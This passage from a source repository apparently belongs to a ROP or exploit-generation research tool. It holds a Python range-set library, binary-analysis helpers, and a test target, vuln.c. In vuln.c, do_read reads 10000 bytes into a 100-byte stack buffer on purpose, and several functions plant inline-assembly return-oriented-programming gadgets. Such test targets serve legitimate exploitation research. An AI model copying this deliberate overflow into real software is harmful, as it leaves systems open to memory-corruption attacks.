https://github.com/axiak/py-rangeset. 14 | 15 | Overview 16 | ------------- 17 | 18 | .. toctree:: 19 | :maxdepth: 2 20 | 21 | 22 | The rangeset implementation offers immutable objects that represent the range 23 | sets as described above. The operations are largely similar to the 24 | `set object `_ with the 25 | obvious exception that mutating methods such as ``.add`` and ``.remove`` 26 | are not available. The main object is the ``RangeSet`` object. 27 | """ 28 | 29 | import bisect 30 | import operator 31 | import functools 32 | import collections 33 | 34 | __version__ = (0, 0, 6) 35 | 36 | __all__ = ('INFINITY', 'NEGATIVE_INFINITY', 37 | 'RangeSet') 38 | 39 | _parent = collections.namedtuple('RangeSet_', ['ends']) 40 | 41 | class _Indeterminate(object): 42 | def timetuple(self): 43 | return () 44 | def __eq__(self, other): 45 | return other is self 46 | 47 | class _Infinity(_Indeterminate): 48 | def __lt__(self, other): 49 | return False 50 | def __gt__(self, other): 51 | return True 52 | def __str__(self): 53 | return 'inf' 54 | __repr__ = __str__ 55 | 56 | class _NegativeInfinity(_Indeterminate): 57 | def __lt__(self, other): 58 | return True 59 | def __gt__(self, other): 60 | return False 61 | def __str__(self): 62 | return '-inf' 63 | __repr__ = __str__ 64 | 65 | INFINITY = _Infinity() 66 | NEGATIVE_INFINITY = _NegativeInfinity() 67 | 68 | class RangeSet(_parent): 69 | def __new__(cls, start, end): 70 | if end is _RAW_ENDS: 71 | ends = start 72 | else: 73 | if isinstance(start, _Indeterminate) and isinstance(end, _Indeterminate) and \ 74 | start == end: 75 | raise LogicError("A range cannot consist of a single end the line.") 76 | if start > end: 77 | start, end = end, start 78 | ends = ((start, _START), (end, _END)) 79 | return _parent.__new__(cls, ends) 80 | 81 | def __merged_ends(self, *others): 82 | sorted_ends = list(self.ends) 83 | for other in others: 84 | sorted_ends.extend(RangeSet.__coerce(other).ends) 85 | sorted_ends.sort() 86 | return sorted_ends 87 | 88 | @classmethod 89 | def __coerce(cls, value): 90 | if isinstance(value, RangeSet): 91 | return value 92 | elif isinstance(value, tuple) and len(value) == 2: 93 | return cls(value[0], value[1]) 94 | else: 95 | return cls.mutual_union(*[(x, x) for x in value]) 96 | 97 | @classmethod 98 | def __iterate_state(cls, ends): 99 | state = 0 100 | for _, end in ends: 101 | if end == _START: 102 | state += 1 103 | else: 104 | state -= 1 105 | yield _, end, state 106 | 107 | def __or__(self, *other): 108 | sorted_ends = self.__merged_ends(*other) 109 | new_ends = [] 110 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 111 | if state > 1 and end == _START: 112 | continue 113 | elif state > 0 and end == _END: 114 | continue 115 | new_ends.append((_, end)) 116 | return RangeSet(tuple(new_ends), _RAW_ENDS) 117 | 118 | union = __or__ 119 | 120 | def __and__(self, *other, **kwargs): 121 | min_overlap = kwargs.pop('minimum', 2) 122 | if kwargs: 123 | raise ValueError("kwargs is not empty: {0}".format(kwargs)) 124 | sorted_ends = self.__merged_ends(*other) 125 | new_ends = [] 126 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 127 | if state == min_overlap and end == _START: 128 | new_ends.append((_, end)) 129 | elif state == (min_overlap - 1) and end == _END: 130 | new_ends.append((_, end)) 131 | return RangeSet(tuple(new_ends), _RAW_ENDS) 132 | 133 | intersect = __and__ 134 | 135 | def __ror__(self, other): 136 | return self.__or__(other) 137 | 138 | def __rand__(self, other): 139 | return self.__and__(other) 140 | 141 | def __rxor__(self, other): 142 | return self.__xor__(other) 143 | 144 | def __xor__(self, *other): 145 | sorted_ends = self.__merged_ends(*other) 146 | new_ends = [] 147 | old_val = None 148 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 149 | if state == 2 and end == _START: 150 | new_ends.append((_, _NEGATE[end])) 151 | elif state == 1 and end == _END: 152 | new_ends.append((_, _NEGATE[end])) 153 | elif state == 1 and end == _START: 154 | new_ends.append((_, end)) 155 | elif state == 0 and end == _END: 156 | new_ends.append((_, end)) 157 | return RangeSet(tuple(new_ends), _RAW_ENDS) 158 | 159 | symmetric_difference = __xor__ 160 | 161 | def __contains__(self, test): 162 | last_val, last_end = None, None 163 | if not self.ends: 164 | return False 165 | if isinstance(test, _Indeterminate): 166 | return False 167 | for _, end, state in RangeSet.__iterate_state(self.ends): 168 | if _ == test: 169 | return True 170 | elif last_val is not None and _ > test: 171 | return last_end == _START 172 | elif _ > test: 173 | return False 174 | last_val, last_end = _, end 175 | return self.ends[-1][0] == test 176 | 177 | def issuperset(self, test): 178 | if isinstance(test, RangeSet): 179 | rangeset = test 180 | else: 181 | rangeset = RangeSet.__coerce(test) 182 | difference = rangeset - ~self 183 | return difference == rangeset 184 | 185 | __ge__ = issuperset 186 | 187 | def __gt__(self, other): 188 | return self != other and self >= other 189 | 190 | def issubset(self, other): 191 | return RangeSet.__coerce(other).issuperset(self) 192 | 193 | __le__ = issubset 194 | 195 | def __lt__(self, other): 196 | return self != other and self <= other 197 | 198 | def isdisjoint(self, other): 199 | return not bool(self & other) 200 | 201 | def __nonzero__(self): 202 | return bool(self.ends) 203 | 204 | def __invert__(self): 205 | if not self.ends: 206 | new_ends = ((NEGATIVE_INFINITY, _START), 207 | (INFINITY, _END)) 208 | return RangeSet(new_ends, _RAW_ENDS) 209 | new_ends = list(self.ends) 210 | head, tail = [], [] 211 | if new_ends[0][0] == NEGATIVE_INFINITY: 212 | new_ends.pop(0) 213 | else: 214 | head = [(NEGATIVE_INFINITY, _START)] 215 | if new_ends[-1][0] == INFINITY: 216 | new_ends.pop(-1) 217 | else: 218 | tail = [(INFINITY, _END)] 219 | for i, value in enumerate(new_ends): 220 | new_ends[i] = (value[0], _NEGATE[value[1]]) 221 | return RangeSet(tuple(head + new_ends + tail), _RAW_ENDS) 222 | 223 | 224 | invert = __invert__ 225 | 226 | def __sub__(self, other): 227 | return self & ~RangeSet.__coerce(other) 228 | 229 | def difference(self, other): 230 | return self.__sub__(other) 231 | 232 | def __rsub__(self, other): 233 | return RangeSet.__coerce(other) - self 234 | 235 | def measure(self): 236 | if not self.ends: 237 | return 0 238 | if isinstance(self.ends[0][0], _Indeterminate) or isinstance(self.ends[-1][0], _Indeterminate): 239 | raise ValueError("Cannot compute range with unlimited bounds.") 240 | return reduce(operator.add, (self.ends[i + 1][0] - self.ends[i][0] for i in range(0, len(self.ends), 2))) 241 | 242 | def range(self): 243 | if not self.ends: 244 | return 0 245 | if isinstance(self.ends[0][0], _Indeterminate) or isinstance(self.ends[-1][0], _Indeterminate): 246 | raise ValueError("Cannot compute range with unlimited bounds.") 247 | return self.ends[-1][0] - self.ends[0][0] 248 | 249 | def __str__(self): 250 | pieces = ["{0} -- {1}".format(self.ends[i][0], self.ends[i + 1][0]) 251 | for i in range(0, len(self.ends), 2)] 252 | return "".format(", ".join(pieces)) 253 | 254 | __repr__ = __str__ 255 | 256 | def __eq__(self, other): 257 | if self is other: 258 | return True 259 | elif not isinstance(other, RangeSet): 260 | try: 261 | other = RangeSet.__coerce(other) 262 | except TypeError: 263 | return False 264 | return self.ends == other.ends 265 | 266 | def __ne__(self, other): 267 | return not self.__eq__(other) 268 | 269 | def __hash__(self): 270 | return hash(self.ends) 271 | 272 | @classmethod 273 | def mutual_overlaps(cls, *ranges, **kwargs): 274 | minimum = kwargs.pop('minimum', 2) 275 | if kwargs: 276 | raise ValueError("kwargs is not empty: {0}".format(kwargs)) 277 | return cls.__coerce(ranges[0]).intersect(*ranges[1:], minimum=minimum) 278 | 279 | @classmethod 280 | def mutual_union(cls, *ranges): 281 | return cls.__coerce(ranges[0]).union(*ranges[1:]) 282 | 283 | @property 284 | def min(self): 285 | return self.ends[0][0] 286 | 287 | @property 288 | def max(self): 289 | return self.ends[-1][0] 290 | 291 | def __iter__(self): 292 | ends_copy = list(self.ends) 293 | for i in range(0, len(ends_copy), 2): 294 | yield (ends_copy[i][0], ends_copy[i + 1][0]) 295 | 296 | _START = -1 297 | _END = 1 298 | 299 | _NEGATE = {_START: _END, _END: _START} 300 | 301 | _RAW_ENDS = object() 302 | 303 | 304 | class LogicError(ValueError): 305 | pass 306 | -------------------------------------------------------------------------------- /utils.py: -------------------------------------------------------------------------------- 1 | import itertools 2 | import sys 3 | 4 | verbose = False 5 | 6 | def align(address, base, of): 7 | offset = (address - base) % of 8 | return address if offset == 0 else address + of - offset 9 | 10 | def hex_bytes(string): 11 | return "".join(map(lambda x: chr(int(x, 16)), filter(len, string.split(" ")))) 12 | 13 | def findall(sub, string, addend): 14 | index = 0 - 1 15 | try: 16 | while True: 17 | index = string.index(sub, index + 1) 18 | yield index + addend 19 | except ValueError: 20 | pass 21 | 22 | def find_all_strings(sections, string): 23 | result = [list(findall(string, section.data(), section.header.p_vaddr)) for section in sections if string in section.data()] 24 | return sum(result, []) 25 | 26 | def find_string(sections, string): 27 | result = [section.header.p_vaddr + section.data().index(string) for section in sections if string in section.data()] 28 | return first_or_none(result) 29 | 30 | def first_or_none(list): 31 | return list[0] if len(list) > 0 else None 32 | 33 | def log(string): 34 | if verbose: 35 | sys.stderr.write(string + "\n") 36 | 37 | def chunks(l, n): 38 | for i in xrange(0, len(l), n): 39 | yield l[i:i+n] 40 | 41 | def integer_to_bigendian(n): 42 | s = '%x' % n 43 | if len(s) & 1: 44 | s = '0' + s 45 | return s.decode('hex') 46 | 47 | def bigendian_to_integer(string): 48 | return string.encode("hex") 49 | 50 | def pairwise(iterable): 51 | "s -> (s0,s1), (s1,s2), (s2, s3), ..." 52 | a, b = itertools.tee(iterable) 53 | next(b, None) 54 | return itertools.izip(a, b) 55 | 56 | def filter_none(list): 57 | return filter(lambda entry: entry is not None, list) 58 | 59 | def insert_and_replace(original, insert, offset): 60 | return original[:offset] + insert + original[offset + len(insert):] 61 | -------------------------------------------------------------------------------- /vuln.c: -------------------------------------------------------------------------------- 1 | // Don't include unistd.h otherwise a secure version of read will be used 2 | // #include 3 | 4 | // #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #if !defined(__x86_64__) && !defined(__i386__) 11 | # error "Unsupported architecture" 12 | #endif 13 | 14 | char put_me_in_bss[1024] = {0}; 15 | 16 | int play_with_stack(int i) { 17 | int *local = alloca(10); 18 | local[0] = 123; 19 | intptr_t memcpy_ptr = (intptr_t) memcpy; 20 | 21 | return local[i] + memcpy_ptr; 22 | } 23 | 24 | void add(int *a, int b) { 25 | *a += b; 26 | } 27 | 28 | void mem_to_mem(int *dst, int *src) { 29 | *dst = *src; 30 | } 31 | 32 | void writemem(void **in, void *val) { 33 | *in = val; 34 | } 35 | 36 | int do_read() { 37 | char buffer[100]; 38 | read(0, buffer, 10000); 39 | } 40 | 41 | void deref_and_write_with_offset() { 42 | #if defined(__x86_64__) 43 | __asm__("pop rax; pop rbx; pop rcx; mov rax,QWORD PTR [rax]; mov QWORD PTR [rax+rcx*1],rbx; ret;"); 44 | #elif defined(__i386__) 45 | __asm__("pop eax; pop ebx; pop ecx; mov eax,DWORD PTR [eax]; mov DWORD PTR [eax+ecx*1],ebx; ret;"); 46 | #endif 47 | } 48 | 49 | void deref_with_offset_and_save() { 50 | #if defined(__x86_64__) 51 | __asm__("pop rax; pop rbx; pop rcx; mov rax, [rax]; mov rax,QWORD PTR [rax+rbx]; mov QWORD PTR [rcx],rax; ret;"); 52 | #elif defined(__i386__) 53 | __asm__("pop eax; pop ebx; pop ecx; mov eax, [eax]; mov eax,DWORD PTR [eax+ebx]; mov DWORD PTR [ecx],eax; ret;"); 54 | #endif 55 | } 56 | 57 | void copy_to_stack() { 58 | #if defined(__x86_64__) 59 | __asm__("pop rbx; pop rcx; mov rbx, QWORD PTR [rbx]; mov QWORD PTR [rsp+rcx*1],rbx; ret;"); 60 | #elif defined(__i386__) 61 | __asm__("pop ebx; pop ecx; mov ebx, DWORD PTR [ebx]; mov DWORD PTR [esp+ecx*1],ebx; ret;"); 62 | #endif 63 | } 64 | 65 | void load_memcpy() { 66 | #if defined(__x86_64__) 67 | __asm__("pop rsi; add rsi,rsp; ret;"); 68 | __asm__("pop rax; add rsp,rax; ret;"); 69 | #elif defined(__i386__) 70 | __asm__("pop eax; pop esi; add esi,esp; mov DWORD PTR [esp+eax], esi; ret;"); 71 | __asm__("pop ebx; add esp,ebx; ret;"); 72 | #endif 73 | } 74 | 75 | void args() { 76 | #if defined(__x86_64__) 77 | __asm__("pop rdi; pop rsi; pop rdx; ret;"); 78 | #endif 79 | } 80 | 81 | int main() { 82 | do_read(); 83 | } 84 | --------------------------------------------------------------------------------